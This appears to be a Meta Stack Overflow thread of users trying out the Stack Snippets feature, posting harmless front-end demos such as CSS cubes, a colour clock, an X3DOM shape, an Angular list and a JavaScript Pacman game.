This is a little more prosaic than other answers. I wanted to see if I can run this js fiddle I used in an answer recently: http://jsfiddle.net/Ljnufjs1/

```css
.field {
    position: absolute;
    width: 205px;
    left: 22px;
    color: #eaeaea;
}

.btn {
    line-height:40px;
    height: 35px;
    cursor: default;
    -webkit-touch-callout: none;
    -moz-user-select: none;
    -khtml-user-select: none;
    -webkit-user-select: none;
    -ms-user-select: none;
    user-select: none;
    text-align: center;
    font-size: 26px;
}

.half {
    width: 101px;
}

#register-btn {
    right:22px;
}

.green
{
    background-color:green;
}
```

```html
<a href="#"><div class="field btn half green" id="register-btn">ثبت نام</div></a>
```

Now I have seen it in action I am very impressed.

Answer (score 2):

See if [this](http://jsfiddle.net/B1KMusic/Lktoefkz/) works.

```js
function getTime(){
    var d = new Date();
    return [d.getHours(), d.getMinutes(), d.getSeconds()];
}

function getColor(){
    var time = getTime();
    var h = parseInt(time[0] * (0xff/24)).toString(16),
        m = parseInt(time[1] * (0xff/60)).toString(16),
        s = parseInt(time[2] * (0xff/60)).toString(16);
    return (p16(h) + p16(m) + p16(s)).toUpperCase();
}

function p10(n){// apply zero-padding if n < 10
    return n < 10 ? ('0' + n) : n;
};

function p16(n){ // p10() for hexadecimal (part of a bugfix)
    return (parseInt(n,16) < 16 ? ('0' + n) : n).toString(16);
};

(function loop(){
    var t = getTime(),
        time = [p10(t[0]),p10(t[1]),p10(t[2])],
        color = getColor(),
        face = document.getElementById("face");
    face.innerHTML = time.join(' : ') + '<hr>' + color;
    face.style.fontSize = (window.innerHeight / 6) + 'px';
    face.style.top = ((window.innerHeight / 2) - (face.clientHeight / 2))+'px';
    face.style.left = ((window.innerWidth / 2) - (face.clientWidth / 2))+'px';
    bg.style.backgroundColor = '#' + color;
    setTimeout(loop,1000);
})();
```

```css
html,body{
    height:100%;
    padding:0;
    margin:0;
}

#bg{
    width:100%;
    height:100%;
    text-align:center;
}
#face{
    color:#ccccee;
    text-shadow:0px 0px 2px #000;
    font:14px arial;
    vertical-align:middle;
    position:absolute;
}
hr{
    background:#ccccee;
    border:none;
    box-shadow:0px 0px 2px #000;
    margin:10px;
    padding:1px;
}
.darken{
    position:absolute;
    left:0;
    top:0;
    padding:0;
    margin:0;
    width:100%;
    height:100%;
    background:rgba(0,0,0,0.2);
    background: -webkit-radial-gradient(circle, rgba(0,0,0,0), rgba(0,0,0,0.6));
    background: -moz-radial-gradient(circle, rgba(0,0,0,0), rgba(0,0,0,0.6));
    cursor:default;
}
```

```html
<html>
    <div id="bg">
        <div id="face"></div>
    </div>
    <div class="darken"></div>
</html>
```

Comment: Well, it would appear that I have broken the sandbox.

Comment: P.S. This is a port of the [fiddle](http://jsfiddle.net/B1KMusic/Lktoefkz/)

Comment: How do you mean "broken the sandbox"? Not sure what issue you are referring to.

Comment: @MartinSmith At the time I made the snippet, the colors in the background were not rendering properly. Instead, it was just grey. I can see that it is working, now. So that effectively voids my earlier statement.

Comment: Looks like the sandbox has been updated, with a snazzy new "copy code snippet" buttons, the much-requested "hide results" button, and improved CSS.

Answer (score 2):

A minor modification to [Ian's test](https://meta.stackoverflow.com/a/270111/256431), but it highlights this is *selectable* text.

A minor feature request that probably wouldn't matter for most normal Q&As: the "Copy code snippet" should automatically include a reference to the original post.

```css
@keyframes rotate {
    from {
        transform: translateZ(-300px) translateY(0px) rotateY(0deg) rotateZ(50deg) rotateX(0deg);
    }
    50% {
        transform: translateZ(-300px) translateY(0px) rotateY(180deg) rotateZ(30deg) rotateX(100deg);
    }
    to {
        transform: translateZ(-300px) translateY(0px) rotateY(360deg) rotateZ(50deg)  rotateX(0deg);
    }
}
.container {
    width: 200px;
    height: 200px;
    position: relative;
    margin: 40px auto 0 auto;
    border: 1px solid #CCC;
    perspective: 1000px;
}
#cube {
    width: 100%;
    height: 100%;
    position: absolute;
    top: -120px;
    transform: translateZ(-100px) translateY(100px);
    transform-style: preserve-3d;
    transition: transform 1s;
    animation: rotate 2s ease-in 1s infinite;
}
#cube figure {
    display: block;
    position: absolute;
    width: 196px;
    height: 196px;
    border: 2px solid black;
    line-height: 196px;
    font-size: 120px;
    font-weight: bold;
    color: #000;
    text-align: center;
    background: rgba(255,255,255,0.5) !important;
}
#cube .front {
    background: hsla(0, 100%, 50%, 0.7);
    transform: translateZ(100px);
}
#cube .back {
    background: hsla(60, 100%, 50%, 0.7);
    transform: rotateX(-180deg) translateZ(100px);
}
#cube .right {
    background: hsla(120, 100%, 50%, 0.7);
    transform: rotateY(90deg) translateZ(100px);
}
#cube .left {
    background: hsla(180, 100%, 50%, 0.7);
    transform: rotateY(-90deg) translateZ(100px);
}
#cube .top {
    background: hsla(240, 100%, 50%, 0.7);
    transform: rotateX(90deg) translateZ(100px);
}
#cube .bottom {
    background: hsla(300, 100%, 50%, 0.7);
    transform: rotateX(-90deg) translateZ(100px);
}
```

```html
<script src="//cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js"></script>

<section class="container">
    <div id="cube" class="show-right">
        <figure class="front">F</figure>
        <figure class="back">B</figure>
        <figure class="right">R</figure>
        <figure class="left">L</figure>
        <figure class="top">U</figure>
        <figure class="bottom">D</figure>
    </div>
</section>
```

Answer (score 2):

Spinning cube (CSS animation) with image and inline SVG as face.

```css
#container {
    width:  120px;
    height: 120px;
    margin: 60px 60px;
}

#cube {
    animation: spinit 8s infinite linear;
    transform-style: preserve-3d;
    transform-origin: 60px 60px 0;
}

@keyframes spinit {
   from { transform: rotateY(0deg)   rotateX(54.735deg) rotateY(45deg); }
   to   { transform: rotateY(360deg) rotateX(54.735deg) rotateY(45deg); } 
}

#cube .face {
    position:    absolute;
    width:       120px;
    height:      120px;
    border:      1px solid black;
    background:  linear-gradient(30deg,orange,yellow,rgba(255,255,255,0.3));
    box-shadow:  inset 0 0 20px rgba(0,0,0,0.4);
    text-align:  center;
    line-height: 120px;
    color:       white;
    font-size:   80px;
    text-shadow: 2px 4px 6px blue;
}

#cube .front  { transform: rotateY(   0deg ) translateZ( 60px ); }
#cube .back   { transform: rotateY( 180deg ) translateZ( 60px ); }
#cube .right  { transform: rotateY(  90deg ) translateZ( 60px ); }
#cube .left   { transform: rotateY( -90deg ) translateZ( 60px ); }
#cube .top    { transform: rotateX(  90deg ) translateZ( 60px ); }
#cube .bottom { transform: rotateX( -90deg ) translateZ( 60px ); }
```

```html
<div id="container">
    <div id="cube">
        <div class="face front">1</div>
        <!-- need to find a image with transparent background for testing -->
        <img class="face left" src="https://i.stack.imgur.com/UFoAJ.jpg?s=128&g=1"/>
        <svg class="face back"
             width="120" height="120" viewBox="0 0 120 120" 
             xmlns="http://www.w3.org/2000/svg" 
             xmlns:svg="http://www.w3.org/2000/svg" 
             xmlns:xlink="http://www.w3.org/1999/xlink">
        <defs>
            <style><![CDATA[                
                .i0, .i1, .i2, .i3, .be, .bo { stroke: black; stroke-width: 1; filter: url(#filter1);  }
                .i0      { fill:  none;    }
                .o0      { fill:  yellow;  }
                .i1, .o1 { fill:  red;     }
                .i2, .o2 { fill:  green;   }
                .i3, .o3 { fill:  blue;    }
                .be      { fill:  #ccffcc; }
                .bo      { fill:  #ccccff; }
            ]]></style>
            <filter id="filter1">
                <feGaussianBlur in="SourceAlpha" result="blur" stdDeviation="4" />
                <feSpecularLighting in="blur" lighting-color="#ffffff" result="specOut" specularConstant="0.75" specularExponent="20" surfaceScale="5">
                        <feDistantLight azimuth="240" elevation="45" />
                </feSpecularLighting>
                <feComposite in="specOut" in2="SourceAlpha" operator="in" result="specOut" />
                <feComposite in="SourceGraphic" in2="specOut" k1="0" k2="1" k3="1" k4="0" operator="arithmetic" result="litPaint" />
            </filter>
        </defs>
        <g transform="matrix( 1 0 0 -1 0 120 )">
            <circle class="i0" cx="60" cy="60" r="40" />
            <circle class="i1" cx="81" cy="60" r="19" />
            <circle class="i2" cx="49" cy="79" r="19" />
            <circle class="i3" cx="49" cy="41" r="19" />
            <circle class="o1" cx="29" cy="60" r="9" />
            <circle class="o3" cx="76" cy="87" r="9" />
            <circle class="o3" cx="27" cy="73" r="4" />
            <circle class="o2" cx="88" cy="82" r="4" />
            <circle class="o2" cx="76" cy="33" r="9" />
            <circle class="o1" cx="65" cy="95" r="4" />
            <circle class="o1" cx="65" cy="25" r="4" />
            <circle class="o3" cx="88" cy="38" r="4" />
            <circle class="o2" cx="27" cy="47" r="4" />
        </g>
        </svg>
        <div class="face right">4</div>
        <div class="face top">5</div>
        <div class="face bottom">6</div>
    </div>
</div>
```

- works correctly on firefox 28.
- needs to find a image with tranparent background to retest.

---

Visualizing a 3d polytope **Metabiaugmented Hexagonal Prism (J56)** using
X3DOM.

```html
<link href="http://www.x3dom.org/x3dom/release/x3dom.css" rel="stylesheet"/>
<script src="http://www.x3dom.org/x3dom/release/x3dom.js"></script>
<h2>metabiaugmented hexagonal prism (J56)</h2>
    <X3D xmlns="http://www.web3d.org/specifications/x3d-namespace" width="800px" height="600px">
    <Scene>
        <Viewpoint position='2.241 -8.365 5.000' orientation='0.967 0.127 0.221 1.076'></Viewpoint>
        <Background skyColor='0.671 0.804 0.937'></Background>
        <Shape>
            <Appearance>
                <Material diffuseColor='1.0 0.9 0.8' specularColor='1.0 1.0 1.0' shininess='0.7' transparency='0.15'/>
                <ImageTexture url='wood004.jpg'/>
            </Appearance>
            <IndexedFaceSet  coordIndex='12 8 3 1 5 10 -1 6 2 4 9 13 11 -1 8 12 13 9 -1 3 8 9 4 -1 5 1 2 6 -1 12 10 11 13 -1 3 0 1 -1 3 4 0 -1 1 0 2 -1 2 0 4 -1 5 7 10 -1 5 6 7 -1 10 7 11 -1 11 7 6 -1'>
                <Coordinate point='-2.608 1.022 -1.076, -1.897 0.375 0.648, -1.642 -0.697 -0.989, -1.067 1.929 -0.240, -0.812 0.857 -1.877, -0.777 -0.899 1.657, -0.522 -1.972 0.020, 0.443 -2.450 1.674, 0.883 2.210 -0.120, 1.138 1.138 -1.757, 1.172 -0.619 1.778, 1.428 -1.691 0.140, 2.003 0.935 0.889, 2.258 -0.137 -0.748,'/>
            </IndexedFaceSet> 
        </Shape>
        <Shape>
            <Appearance>
                <Material emissiveColor='0.0 0.0 0.0' specularColor='1.0 1.0 1.0' shininess='0.7'/>
            </Appearance>
            <IndexedLineSet  coordIndex='12 8 3 1 5 10 -1 6 2 4 9 13 11 -1 8 12 13 9 -1 3 8 9 4 -1 5 1 2 6 -1 12 10 11 13 -1 3 0 1 -1 3 4 0 -1 1 0 2 -1 2 0 4 -1 5 7 10 -1 5 6 7 -1 10 7 11 -1 11 7 6 -1'>
                <Coordinate point='-2.608 1.022 -1.076, -1.897 0.375 0.648, -1.642 -0.697 -0.989, -1.067 1.929 -0.240, -0.812 0.857 -1.877, -0.777 -0.899 1.657, -0.522 -1.972 0.020, 0.443 -2.450 1.674, 0.883 2.210 -0.120, 1.138 1.138 -1.757, 1.172 -0.619 1.778, 1.428 -1.691 0.140, 2.003 0.935 0.889, 2.258 -0.137 -0.748,'/>
            </IndexedLineSet> 
        </Shape>
    </Scene>
    </X3D>
```

- doesn't  work, why?

Comment: how do you do collapsible sections?

Comment: @Ian To hide the snippet by default, go to the bottom of the snippet editor and select the checkbox "Hide snippet by default...". If you already have some snippet code in your answer, look for the line `<!-- begin snippet: js hide: false -->` and change false to true there.

Answer (score 2):

```js
$(document).ready(function() {
  $.get('http://crossorigin.me/http://php.net/', function(data) {
    var $php = $(data), rcs = [], ver = 0, num = 0, i = 0, time;
    $php.find('h2.newstitle > a').each(function() {
      var txt = $(this).text();
      var matches = /([\d.]+) (RC ([\d.]+))?/.exec(txt);
      if(matches) {
        time = $(this).parent().parent().find('time').text();
        if(matches[2]) {
          ver = matches[1];
          if(matches[3] > num) num = matches[3];
        } else {
          $('#php').prepend($('<div style="white-space: pre;"></div>').html((i++ === 2 ? '<b>Current' : '<b>Old') + ' Stable Version:</b> ' + matches[1] + ' // Release Date: ' + time));
        }
      }
    });
    $('#php').append($('<div></div>').html('<b>Next Stable Version:</b> ' + ver + ' RC ' + num + ' \t\t// Release Date: ' + time));
  });
});
```

```html
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<div id="php"></div>
```

Answer (score 2):

```js
function DemoController($scope) {
  
  $scope.items = [
    { access: 'TuChanca' },
    { access: 'SomethingElse' },
  ];
  
  $scope.isRowDisabled = function(item) {
    // Return true to apply 'off' class
    return !validateItem(item);
  };
    
  $scope.onRowClick = function(item) {
    if (validateItem(item)) {
      alert('Row has been click');
    }
  };
    
  function validateItem(item) {
    // Return true if item is clickable
    return item.access === 'TuChanca';
  }
}
```

```css
.row {
  border: 1px solid #cccccc;
  background: #fafafa;
  color: rgba(0,0,0,0.87);
  padding: 10px;
}

.row:not(.off):hover {
  cursor: pointer;
  background: rgba(0,0,0,0.07);
}

.row.off {
  color: rgba(0,0,0,0.5);
  cursor: not-allowed;
}
```

```html
<html ng-app>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.23/angular.min.js"></script>
<body ng-controller='DemoController'>

  <div class="row"
       ng-repeat="item in items" 
       ng-class="{ 'off': isRowDisabled(item) }"
       ng-click="onRowClick(item)">
    {{ item.access }}
  </div>
  
</body>
</html>
```

Answer (score 2):

Pacman snippet

```js
var ghostInterval, gameInterval;

var pacman = (function () {
    var names = ['inky', 'pinky', 'clyde', 'blinky'];
    var directions = Object.freeze({
        PAUZED: {
            type: 'stopped',
            sprite: 'pauzed',
            x: 0,
            y: 0
        },
        LEFT: {
            type: 'horizontal',
            sprite: 'left',
            x: -1,
            y: 0
        },
        UP: {
            type: 'vertical',
            sprite: 'top',
            x: 0,
            y: -1
        },
        RIGHT: {
            type: 'horizontal',
            sprite: 'right',
            x: 1,
            y: 0
        },
        DOWN: {
            type: 'vertical',
            sprite: 'down',
            x: 0,
            y: 1
        }
    });
    var mapObjects = {
        ' ': 'blank',
            'a': 'corner-left-top',
            'b': 'corner-right-top',
            'c': 'corner-right-bottom',
            'd': 'corner-left-bottom',
            '=': 'border-horizontal',
            '|': 'border-vertical',
            't': 'double-down',
            '>': 'left-out',
            '<': 'right-out',
            '+': 'double-right',
            '*': 'double-left',
            '1': 'left-top',
            '2': 'right-top',
            '3': 'right-bottom',
            '4': 'left-bottom',
            '8': 'single-down',
            'A': 'single-up',
            '9': 'single-vertical',
            '-': 'single-horizontal',
            '_': 'ghost-gate',
            '6': 'single-right',
            '7': 'single-left',
            'B': 'left-down',
            'C': 'down-right',
            '.': 'split-up',
            'T': 'split-down',
            '5': 'horizontal',
            'X': 'port',
            'o': 'point',
            '%': 'superball'
    };

    var level1 = [
        'a========t========b',
        '|%ooooooo9ooooooo%|',
        '|o12o152o9o152o12o|',
        '|o43o453oAo453o43o|',
        '|ooooooooooooooooo|',
        '|o67o8 6-T-7o8o67o|',
        '|%ooo9ooo9ooo9ooo%|',
        'd==bo>-7oAo6-<oa==c',
        '   |o9ooooooo9o|   ',
        '===coAoa=_=boAod===',
        'X   o o|   |o     X',
        '===bo8od===co8oa===',
        '   |o9ooooooo9o|   ',
        'a==coAo6-T-7 Aod==b',
        '|%ooooooo9ooooooo%|',
        '|o6Bo6-7oAo6-7oC7o|',
        '|oo9oooooPooooo9oo|',
        '+7 Ao8o6-T-7o8oAo6*',
        '|oooo9ooo9ooo9oooo|',
        '|o6--.-7 A 6-.--7o|',
        '|%ooooooooooooooo%|',
        'd=================c'];

    var level2 = [
        '6---T----T----T---7',
        'X   9%   9   %9   X',
        '8 8 9 12 9 12 9 8 8',
        '9 9 A 43 A 43 A 9 9',
        '9 A             A 9',
        '9   1---7 6---2   9',
        '9 8 9         9 8 9',
        '9 9 9 6-------< 9 9',
        '9 9 9         9 9 9',
        '9 9 4-------7 A 9 9',
        '9 9             9 9',
        '9 4-----7 6-----3 9',
        '9                 9',
        '4-------2 1-------3',
        '        9 9        ',
        '1-------3 4-------2',
        '9        P        9',
        '9 8 8 12 8 12 8 8 9',
        'A A 9 43 9 43 9 A A',
        'X   9%   9   %9   X',
        '6---.----.----.---7'];

    var pacman = {
        location: function (x, y) {
            if (!(this instanceof pacman.location)) {
                return new pacman.location(x, y);
            }
            this.x = x;
            this.y = y;

            pacman.location.prototype.increase = function (point) {
                if (point.x === undefined || point.y === undefined) {
                    return;
                }
                this.x += point.x;
                this.y += point.y;
            };

            pacman.location.prototype.next = function (point) {
                return new pacman.location(this.x + point.x, this.y + point.y);
            };

            pacman.location.prototype.center = function () {
                return {
                    x: this.x + 7.5,
                    y: this.y + 7.5
                };
            };

            return this;
        },
        cube: function (row, col, field, element) {
            if (!(this instanceof pacman.cube)) {
                return new pacman.cube(row, col, field);
            }
            this.row = row;
            this.col = col;
            this.left = col * 15;
            this.top = row * 15;
            this.right = this.left + 15;
            this.bottom = this.top + 15;
            this.field = field;
            this.element = element;

            this.tester = function (x, y) {
                var p = {
                    x: x,
                    y: y
                };
                return p.x >= this.left && p.x < this.right && p.y >= this.top && p.y < this.bottom;
            };

            pacman.cube.prototype.intersectsWith = function (left, right, top, bottom) {
                return this.tester(left, top) || this.tester(left, bottom) || this.tester(right, top) || this.tester(right, bottom);
            };

            return this;
        },
        point: function (row, col, field, elem) {
            if (!(this instanceof pacman.point)) {
                return new pacman.point(row, col, field);
            }
            this.row = row;
            this.col = col;
            this.left = (col * 15) + 3;
            this.top = (row * 15) + 3;
            this.right = this.left + 8;
            this.bottom = this.top + 8;
            this.element = elem;
            this.points = field === 'o' ? 50 : 100;
            this.interval = undefined;
            this.step = 0;
            this.field = field;
            this.isSuperball = field === '%';

            if (field === '%') {
                var local = this;
                this.interval = setInterval(function () {
                    local.animate();
                }, 250);
            }

            this.animate = function () {
                if (!this.element) {
                    clearInterval(this.interval);
                    return;
                }
                this.element.className = 'superball-' + (this.step % 2);
                this.step++;
                if (this.step > 100) {
                    this.step = 0;
                }
            }

            this.tester = function (x, y) {
                var p = {
                    x: x,
                    y: y
                };
                return p.x >= this.left && p.x < this.right && p.y >= this.top && p.y < this.bottom;
            };

            pacman.point.prototype.isInside = function (location) {
                var ctr = location.center();
                return this.tester(ctr.x, ctr.y);
            };

            pacman.point.prototype.remove = function () {
                if (this.interval !== undefined || this.element === undefined) {
                    clearInterval(this.interval);
                }
                if (this.element !== undefined) {
                    var fieldElement = document.getElementById('field');
                    if (fieldElement) {
                        fieldElement.removeChild(this.element);
                        this.element = undefined;
                    }
                    return this.points;
                }
                return 0;
            };

            return this;
        },
        ghost: function (x, y, element, name) {
            // make sure this always returns an object
            if (!(this instanceof pacman.ghost)) {
                return new pacman.ghost(x, y, element, name);
            }

            this.scared = 0;
            this.name = name;
            this.position = new pacman.location(x, y);
            this.direction = {
                current: directions.RIGHT,
                next: null
            };

            this.setDirection = function (new_direction) {
                // gets moved in the next iteration of the game field (user can correct if he is fast enough)
                this.direction.next = new_direction;
            };

            this.doMove = function (levelset, points) {
                this.setPosition(this.position.next(this.direction.current), levelset);
            };

            this.canMove = function (pos, levelset) {
                if (levelset === undefined)
                {
                    return false;
                }
                var left = pos.x,
                    right = pos.x + 14,
                    top = pos.y,
                    bottom = pos.y + 14;
                for (var x = 0; x < levelset.length; x++) {
                    var i = levelset[x];
                    debugger;
                    if (i.field == '_') {
                        continue;
                    }
                    if (i.intersectsWith(left, right, top, bottom)) {
                        return false;
                    }
                }
                return true;
            }

            this.getNextDirection = function (direction) {
                var s = ['left', 'right', 'up', 'down'];
                var next = Math.floor(Math.random() * s.length);
                while (direction.type == directions[s[next].toUpperCase()].type) {
                    next = Math.floor(Math.random() * s.length);
                }
                return directions[s[next].toUpperCase()];
            };

            this.setPosition = function (pos, levelset) {
                if (!this.canMove(this.position.next(this.direction.current), levelset)) {
                    this.direction.current = this.getNextDirection(this.direction.current);
                    this.direction.next = this.getNextDirection(this.direction.current);
                    return;
                }
                // no testing needed if it's not at a possible new block
                if (pos.x % 15 == 0 || pos.y % 15 == 0) {
                    if (this.direction.next !== null && this.direction.next !== undefined) {
                        if (this.canMove(pos.next(this.direction.next), levelset)) {
                            this.direction.current = this.direction.next;
                            this.direction.next = this.getNextDirection(this.direction.current);
                        }
                    }
                }
                if (pos.x < 0) {
                    pos.x += 270;
                }
                if (pos.x > 270) {
                    pos.x -= 270;
                }
                this.position = pos;
                this.playerElement.style.left = this.position.x + 'px';
                this.playerElement.style.top = this.position.y + 'px';
            };

            this.redraw = function (levelset, points) {
                var p = this;
                p.doMove(levelset, points);
                if (this.scared > 0) {
                    this.scared--;
                    p.playerElement.className = 'sprite gc ghost scared-' + (this.scared % 2);
                }
                else
                {
                    p.playerElement.className = 'sprite gc ghost ' + p.name + '-' + p.direction.current.sprite;
                }
                if (pacman.currentPlayer.isInside(p.position))
                {
                    if (this.scared > 0)
                    {
                        this.scared = 0;
                        this.position.x = 120; this.position.y = 150;
                        pacman.currentPlayer.addPoints(150);
                    }
                    else
                    {
                        var newGame = false;
                        pacman.currentPlayer.score.livesLeft--;
                        if (pacman.currentPlayer.score.livesLeft == 0)
                        {
                            newGame = true;
                            $('#txtLives').text(pacman.currentPlayer.score.livesLeft);
                            clearInterval(gameInterval);
                            clearInterval(ghostInterval);
                            alert('You have lost the game! After you click ok, the game will restart!');
                            pacman.currentPlayer = new pacman.player();
                        }
                        pacman.reset(levelset, points, newGame);
                    }
                }
            };

            this.playerElement = element;
        },
        player: function () {
            // make sure this always returns an object
            if (!(this instanceof pacman.player)) {
                return new pacman.player(arguments);
            }
            
            this.position = new pacman.location(185, 110);
            this.direction = {
                current: directions.PAUZED,
                next: null
            };
            this.score = {
                points: 0,
                livesLeft: 3,
                name: 'Player'
            };

            this.tester = function (x, y) {
                var p = {
                    x: x,
                    y: y
                };
                return p.x >= this.position.x && p.x < this.position.x + 15 && p.y >= this.position.y && p.y < this.position.y + 15;
            };
            
            this.lastLife = 0;
            this.interval = 5000;

            pacman.player.prototype.isInside = function (location) {
                var ctr = location.center();
                return this.tester(ctr.x, ctr.y);
            };

            this.setDirection = function (new_direction) {
                // gets moved in the next iteration of the game field (user can correct if he is fast enough)
                this.direction.next = new_direction;
            };

            this.doMove = function (levelset, points) {
                this.setPosition(this.position.next(this.direction.current), levelset);
                // after this move, the position should be new, and we could check if there are points to be found around us :)
                this.checkPoints(points);
            };
            
            this.addPoints = function(p) {
                this.score.points += p;
                if (this.score.points > this.lastLife + this.interval)
                {
                    this.lastLife = this.score.points;
                    this.score.livesLeft++;
                    $('#txtLives').text(this.score.livesLeft);
                }
                $('#txtScore').text(this.score.points);
            };

            this.checkPoints = function (points) {
                if (points === undefined)
                {
                    return;
                }
                var removeAt = -1;
                for (var x = 0; x < points.length; x++) {
                    var i = points[x];
                    if (i.isInside(this.position)) {
                        if (i.field === '%')
                        {
                            $(names).each(function() {
                                pacman[this].scared += 250;
                            });
                        }
                        this.addPoints(i.remove());
                        removeAt = x;
                        break;
                    }
                }
                if (removeAt >= 0) {
                    points.remove(removeAt);
                    if (points.length == 0) {
                        clearInterval(gameInterval);
                        clearInterval(ghostInterval);
                        //alert('Congratulations, you finished the level!\r\n\r\nPress F5 to restart');
                        pacman.reset();
                    }
                }
            };

            this.lastIndex = {
                row: -1,
                col: -1
            };

            this.getIndex = function (position) {
                return {
                    row: Math.floor(position.y / 15.0),
                    col: Math.floor(position.x / 15.0)
                };
            }

            this.canMove = function (pos, levelset) {
                if (levelset === undefined)
                {
                    return false;
                }
                var left = pos.x,
                    right = pos.x + 14,
                    top = pos.y,
                    bottom = pos.y + 14;
                for (var x = 0; x < levelset.length; x++) {
                    var i = levelset[x];
                    if (i.intersectsWith(left, right, top, bottom)) {
                        return false;
                    }
                }
                return true;
            }

            this.setPosition = function (pos, levelset) {
                if (this.direction.current != directions.PAUZED) {
                    if (!this.canMove(this.position.next(this.direction.current), levelset)) {
                        this.direction.current = directions.PAUZED;
                        return;
                    }
                }
                // no testing needed if it's not at a possible new block
                if (pos.x % 15 == 0 || pos.y % 15 == 0) {
                    if (this.direction.next !== null && this.direction.next !== undefined) {
                        if (this.direction.next == directions.PAUZED) {
                            this.direction.current = directions.PAUZED;
                            this.direction.next = null;
                        } else {
                            if (this.canMove(pos.next(this.direction.next), levelset)) {
                                this.direction.current = this.direction.next;
                                this.direction.next = null;
                            }
                        }
                    }
                }
                if (levelset === undefined)
                {
                    return;
                }
                if (pos.x < 0) {
                    pos.x += 270;
                }
                if (pos.x > 270) {
                    pos.x -= 270;
                }
                this.position = pos;
                this.playerElement.style.left = this.position.x + 'px';
                this.playerElement.style.top = this.position.y + 'px';
            };

            var animation = 0,
                adir = 0.1,
                lastani = -1;

            this.redraw = function (levelset, points) {
                var p = this;
                p.doMove(levelset, points);
                var i = parseInt(animation) % 3;
                if (i != lastani) {
                    lastani = i;
                    p.playerElement.className = 'sprite gc pacman-' + p.direction.current.sprite.toLowerCase() + '-' + i;
                }
                animation += adir;
                if (animation == 2 || animation == 0) {
                    adir *= -1;
                }
            };

            this.playerElement = document.getElementById('player');
        },
        level: function (description, points) {
            var fieldElement = document.getElementById('field');
            var height = description.length;
            var arr = [],
                pf = [];
            for (var y = 0; y < height; y++) {
                var row = description[y];
                var width = row.length;
                for (var x = 0; x < width; x++) {
                    var field = row.charAt(x);
                    if (field === 'P') {
                        pacman['currentPlayer'].setPosition(pacman.location(x * 15, y * 15), arr);
                        continue;
                    }
                    if (field === 'o' || field === '%') {
                        // point to eat or superball
                        if (points !== undefined && points.length > 0) {
                            continue;
                        }
                        var point = document.createElement('div');
                        point.className = mapObjects[field];
                        point.style.left = ((x * 15) + 3) + 'px';
                        point.style.top = ((y * 15) + 3) + 'px';
                        point.style.width = '8px';
                        point.style.height = '8px';
                        fieldElement.appendChild(point);
                        pf.push(new pacman.point(y, x, field, point));
                        continue;
                    }
                    var classname = mapObjects[field];
                    if (classname === "undefined" || classname === "null" || classname === "blank") {
                        continue;
                    }
                    var block = document.createElement('div');
                    block.className = 'sprite gc ' + classname;
                    block.style.left = (x * 15) + 'px';
                    block.style.top = (y * 15) + 'px';
                    block.style.width = '15px';
                    block.style.height = '15px';
                    fieldElement.appendChild(block);
                    if (field == 'X') {
                        // pacman can run through ports
                        continue;
                    }
                    arr.push(new pacman.cube(y, x, field, block));
                }
            }
            return {
                blocks: arr,
                points: points !== undefined && points.length > 0 ? points : pf
            };
        },
        onKeydown: function (e) {
            var p = pacman['currentPlayer'];
            var handled = true;
            if (e.key !== undefined && e.key !== null) {
                switch (e.key) {
                    case 'Up':
                        p.setDirection(directions.UP);
                        break;
                    case 'Down':
                        p.setDirection(directions.DOWN);
                        break;
                    case 'Left':
                        p.setDirection(directions.LEFT);
                        break;
                    case 'Right':
                        p.setDirection(directions.RIGHT);
                        break;
                    default:
                        handled = false;
                        break;
                }
                if (handled) {
                    return;
                }
            }
            handled = true;
            switch (e.keyCode) {
                case 80:
                    p.direction.current = directions.PAUZED;
                    break;
                case 82:
                    p.direction.current = directions.PAUZED;
                    break;
                case 38:
                    p.setDirection(directions.UP);
                    break;
                case 40:
                    p.setDirection(directions.DOWN);
                    break;
                case 37:
                    p.setDirection(directions.LEFT);
                    break;
                case 39:
                    p.setDirection(directions.RIGHT);
                    break;
                default:
                    handled = false;
                    break;
            }
        },
        start: function (points) {
            var animation = 0,
                direction = 1;
            if (pacman['currentPlayer'] === undefined) {
                pacman['currentPlayer'] = new pacman.player();
            }
            $('#txtScore').text(pacman.currentPlayer.score.points);
            $('#txtLives').text(pacman.currentPlayer.score.livesLeft);
            var levelset = pacman.level(level1, points);
            gameInterval = setInterval(function () {
                try {
                    if (levelset === undefined)
                    {
                        clearInterval(gameInterval);
                        return;
                    }
                    pacman.currentPlayer.redraw(levelset.blocks, levelset.points);
                } catch (ex) { console.log(ex); }
            }, 5);
            for (var x = 0; x < 4; x++) {
                var g = document.createElement('div');
                g.className = 'sprite gc ghost ' + names[x] + '-right';
                g.style.position = 'absolute';
                g.style.left = '120px';
                g.style.top = '150px';
                g.style.width = '15px';
                g.style.height = '15px';
                var fe = document.getElementById('field');
                fe.appendChild(g);
                pacman[names[x]] = new pacman.ghost(120, 150, g, names[x]);
            }
            ghostInterval = setInterval(function () {
                $(names).each(function () {
                    var p = pacman[this];
                    if (p === undefined)
                    {
                        clearInterval(ghostInterval);
                        return;
                    }
                    p.redraw(levelset.blocks, levelset.points);
                });
            }, 5);
        },
        reset: function(blocks, points, isNewGame) {
            clearInterval(ghostInterval);
            clearInterval(gameInterval);
            var fd = document.getElementById('field');
            $(blocks).each(function() {
                fd.removeChild(this.element);
            });
            blocks.splice(0, blocks.length);
            if (isNewGame)
            {
                $(points).each(function() {
                    fd.removeChild(this.element);
                });
                points.splice(0, points.length);
            }
            $('.ghost').each(function() {
                fd.removeChild(this);
            });
            $(names).each(function() {
                pacman[this] = undefined;
            });
            pacman.start(points);
        }
    };

    return pacman;
})();

Array.prototype.remove = function (index) {
    this.splice(index, 1);
}

$(function () {
    $(document).keydown(pacman.onKeydown);
    pacman.start();
});
```

```css
    html {
        font-family:'Verdana';
        font-size: 1em;
    }
    body {
        background: #000000;
        overflow: hidden;
        margin: 0;
        padding: 0;
    }
    h1 {
        line-height: 1em;
        font-size: 3em;
        padding: 0;
        margin: 0;
        text-align: center;
        color: yellow;
        text-decoration: none;
    }
    small {
        color: #777777;
        font-style: italic;
        text-align: center;
        display: block;
        margin: 0;
        padding: 0;
    }
    #game {
        position: fixed;
        left: 0;
        right: 0;
        top: 0;
        bottom: 0;
    }
    #console {
        color: #ffffff;
    }
    .sprite {
        background-image: url('http://i50.tinypic.com/16c2nux.png');
        width: 16px;
        height: 16px;
    }
    .gc {
        position: absolute;
        display: inline-block;
        /*background-color: #000000;*/
        margin: 0;
        padding: 0;
        /*border: solid #cfcfcf 1px;*/
    }
    .console {
        color: #ffffff;
    }
